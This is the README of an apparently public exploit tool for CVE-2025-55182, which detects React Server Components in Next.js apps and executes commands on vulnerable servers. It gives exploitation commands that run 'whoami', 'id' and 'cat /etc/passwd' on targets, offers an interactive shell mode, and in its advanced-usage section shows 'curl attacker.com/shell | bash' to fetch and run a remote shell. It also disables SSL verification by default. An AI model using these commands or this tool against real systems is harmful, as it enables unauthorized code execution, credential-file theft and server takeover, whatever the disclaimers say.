Share
## https://sploitus.com/exploit?id=D86C7681-40BF-5F48-822B-36CBB81E2007
# RSC Detector - React Server Components Vulnerability Scanner

A Python-based security scanner for detecting and exploiting **React Server Components (RSC)** vulnerabilities in Next.js applications. This tool performs passive detection, active fingerprinting, and RCE exploitation testing.

> โš ๏ธ **WARNING**: This tool is for **authorized security testing only**. Unauthorized access to computer systems is illegal. Always obtain written permission before testing.

---

## Features

โœ… **Passive Detection** - Analyzes HTML, headers, and page structure for RSC indicators  
โœ… **Active Fingerprinting** - Sends RSC-specific headers to detect server responses  
โœ… **HTTP Header Analysis** - Identifies Next.js and RSC-related headers  
โœ… **RCE Exploitation** - Executes commands on vulnerable servers (if exploitable)  
โœ… **Colored Terminal Output** - Enhanced visual feedback for better readability  
โœ… **Interactive Mode** - Execute multiple commands in exploitation mode  
โœ… **Robust Decoding** - Handles gzip-compressed and binary payloads  

---

## Installation

### Prerequisites
- Python 3.8+
- pip (Python package manager)

### Setup

1. **Clone the repository**
   ```bash
   git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
   cd CVE-2025-55182
   ```

2. **Install dependencies**
   ```bash
   pip install -r requirements.txt
   ```

   **Required packages:**
   - `requests>=2.28.0` - HTTP client library
   - `urllib3>=1.26.0` - Advanced HTTP utilities
   - `colorama>=0.4.6` - Terminal colors (Windows compatible)
   - `beautifulsoup4` - HTML parsing

---

## Usage

### Basic Detection (No Exploitation)
```bash
python rsc_detector.py https://example.com
```

### Full Scan with Exploitation
```bash
python rsc_detector.py https://example.com --exploit
```

### Execute Specific Command
```bash
python rsc_detector.py https://example.com --exploit --cmd "whoami"
```

### Interactive Exploitation Mode
```bash
python rsc_detector.py https://example.com --exploit
```
Then enter commands at the prompt (type `quit` to exit).

---

## Command Line Options

| Option | Description |
|--------|-------------|
| `` | Target URL (required). Auto-prefixes `https://` if missing |
| `--exploit` | Enable RCE exploitation after detection |
| `--cmd ` | Execute a specific command (use with `--exploit`) |

### Examples

**Detect RSC vulnerability:**
```bash
python rsc_detector.py https://target.com
```

**Exploit and run `id` command:**
```bash
python rsc_detector.py https://target.com --exploit --cmd "id"
```

**Exploit and run `cat /etc/passwd`:**
```bash
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
```

**Interactive mode (multiple commands):**
```bash
python rsc_detector.py https://target.com --exploit
```

---

## How It Works

### 1. **Passive Scan**
- Checks for `window.__next_f` marker (Next.js App Router)
- Detects `text/x-component` Content-Type
- Searches for React Flight Protocol markers
- Analyzes `__NEXT_DATA__` and Next.js imports

### 2. **Header Analysis**
- Examines `Server`, `Vary`, and `X-Nextjs-Cache` headers
- Identifies RSC awareness in HTTP headers

### 3. **Active Fingerprinting**
- Sends requests with `RSC: 1` header
- Analyzes server response to RSC-specific headers
- Detects React Flight Protocol structure

### 4. **RCE Exploitation**
- Constructs malicious JSON payload exploiting React Server Component serialization
- Sends multipart form-data to trigger server-side code execution
- Decodes base64-encoded command output
- Supports gzip-compressed responses

---

## Output & Results

### Detection Results
```
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible
```

### Exploitation Output
```
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
```

---

## Vulnerability Details

**CVE-2025-55182** exploits:
- **React Server Component (RSC)** serialization flaws
- **Next.js Server Action** deserialization vulnerabilities
- **Object prototype pollution** via malicious payloads
- **Command injection** through `child_process.execSync()`

### Attack Surface
- Next.js applications using App Router
- Server Components with user-controlled inputs
- Applications with RSC enabled but not properly validated

---

## Legal & Ethical Guidelines

### โš ๏ธ Important
This tool is **STRICTLY FOR AUTHORIZED SECURITY TESTING ONLY**:

1. โœ… **DO**: Use on systems you own or have written permission to test
2. โœ… **DO**: Report vulnerabilities responsibly to the vendor
3. โœ… **DO**: Follow responsible disclosure practices
4. โŒ **DO NOT**: Use against systems without authorization
5. โŒ **DO NOT**: Use for malicious purposes
6. โŒ **DO NOT**: Store or execute sensitive data

**Unauthorized computer access is illegal** under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act 1990 - UK
- Similar laws in most countries

---

## Responsible Disclosure

If you discover a vulnerability using this tool:

1. **DO NOT** publicly disclose until vendor has patched
2. **Contact** the vendor's security team directly
3. **Allow** 90 days for patch development
4. **Coordinate** with the vendor on disclosure timing
5. **Credit** yourself in advisories after disclosure

---

## Troubleshooting

### SSL Certificate Errors
The tool ignores SSL verification by default. To enable verification:
```python
detector = RSCDetector(url, verify_ssl=True)
```

### Base64 Decoding Errors
The tool automatically:
- Adds padding to malformed base64 strings
- Detects and decompresses gzip payloads
- Falls back to UTF-8 replacement characters for binary data

### No "digest" Key in Response
- Target may not be vulnerable
- Server may filter the exploit payload
- Try manual testing or different endpoints

### Timeout Issues
Increase timeout in the code:
```python
response = self.session.get(self.url, timeout=30)  # 30 seconds
```

---

## Project Structure

```
CVE-2025-55182/
โ”œโ”€โ”€ README.md                # This file
โ”œโ”€โ”€ requirements.txt         # Python dependencies
โ”œโ”€โ”€ rsc_detector.py         # Main scanner & exploit engine
โ”œโ”€โ”€ rsc_cli.py              # CLI utilities (if present)
โ”œโ”€โ”€ script.py               # Additional scripts (if present)
โ”œโ”€โ”€ COLOR_GUIDE.md          # Color output documentation
โ””โ”€โ”€ .gitignore              # Git ignore rules
```

---

## Dependencies

```
requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)
```

Install all at once:
```bash
pip install -r requirements.txt
```

---

## Performance Tips

- **Speed up detection**: Skip `--exploit` flag if only scanning
- **Batch testing**: Create a script to scan multiple URLs
- **Network timeout**: Adjust timeout values for slow networks
- **SSL bypass**: Verification is disabled by default for flexibility

---

## Advanced Usage

### Custom Command Execution
```bash
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
```

### Output Redirection
```bash
python rsc_detector.py https://target.com > scan_results.txt 2>&1
```

### Batch Scanning
```bash
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done
```

---

## Limitations

- โš ๏ธ Only works on vulnerable Next.js configurations
- โš ๏ธ Requires RSC enabled on target application
- โš ๏ธ Some servers may filter or block exploit payloads
- โš ๏ธ Binary output may not display correctly in terminal
- โš ๏ธ Command execution depends on server permissions

---

## Contributing

Found a bug or have an enhancement? Contributions welcome!

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Submit a Pull Request

---

## Disclaimer

```
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
```

---

## License

This project is provided for **educational and authorized security testing purposes only**.

---

## References

- [React Server Components Documentation](https://react.dev/reference/rsc/server-components)
- [Next.js App Router](https://nextjs.org/docs/app)
- [CVE-2025-55182](https://nvd.nist.gov/) (When available)
- [OWASP: Injection Flaws](https://owasp.org/www-community/Injection_Flaws)

---

## Contact & Support

- **Report Vulnerabilities**: Use responsible disclosure
- **Security Issues**: Do not post publicly; contact maintainers directly
- **Feature Requests**: Open an issue on GitHub

---

## Author

Created for security research and authorized penetration testing.

**Last Updated**: December 19, 2025

---

## Changelog

### v1.0.0
- โœ… Passive RSC detection
- โœ… Active fingerprinting
- โœ… RCE exploitation
- โœ… Colored terminal output
- โœ… Interactive exploitation mode
- โœ… Gzip decompression support
- โœ… Robust base64 decoding

---

**Remember**: Great power comes with great responsibility. Use this tool ethically and legally.